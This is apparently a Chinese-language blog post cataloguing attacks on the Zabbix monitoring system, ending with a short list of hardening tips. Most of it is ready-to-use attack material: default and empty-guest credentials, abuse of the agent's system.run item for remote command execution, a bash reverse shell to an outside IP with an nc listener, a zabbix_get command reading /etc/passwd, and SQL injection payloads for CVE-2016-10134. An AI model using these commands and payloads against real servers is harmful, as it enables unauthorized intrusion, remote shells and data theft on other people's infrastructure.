zabbix漏洞

1. Zabbix配置不當安全事件

  • sohu的zabbix,可導致內網滲透
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627
  • 京東某站shell直入jae內網物理機內核版本過低
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349

2. Zabbix弱口令利用

  1. zabbix默認的口令爲Admin:zabbix,並且存在guest賬戶密碼爲空。
  2. Zabbix server可以遠程在agent的機器上執行任意命令

3. 建立監控項

  • zabbix_get命令調用
system.run[command,<mode>] # 這個模塊是agent自帶的,獲取服務器shell,獲取root權限。
  • 反彈提權
bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc -lvp 6666
  • zabbix_get命令調用:
zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'

4. Zabbix注入

  • latest.php SQL注入漏洞(CVE-2016-10134)
Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0
# 用來賓賬號的session的後6位 替換鏈接的sid ,即可通過user() 調用出當前的啓動用戶
  • 直接訪問,不需要其他的東西
jsrpc.php? type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
  • 除此之外,還可以使用BurpSuite爆破口令

  • 防護措施

  1. 不要放外網
  2. 修改默認密碼
  3. 禁用guest 用戶
  4. 不要以root啓動
  5. 401認證
  6. 備份數據 -> 升級版本
  7. 做測試找漏洞
發佈了65 篇原創文章 · 獲贊 6 · 訪問量 1萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章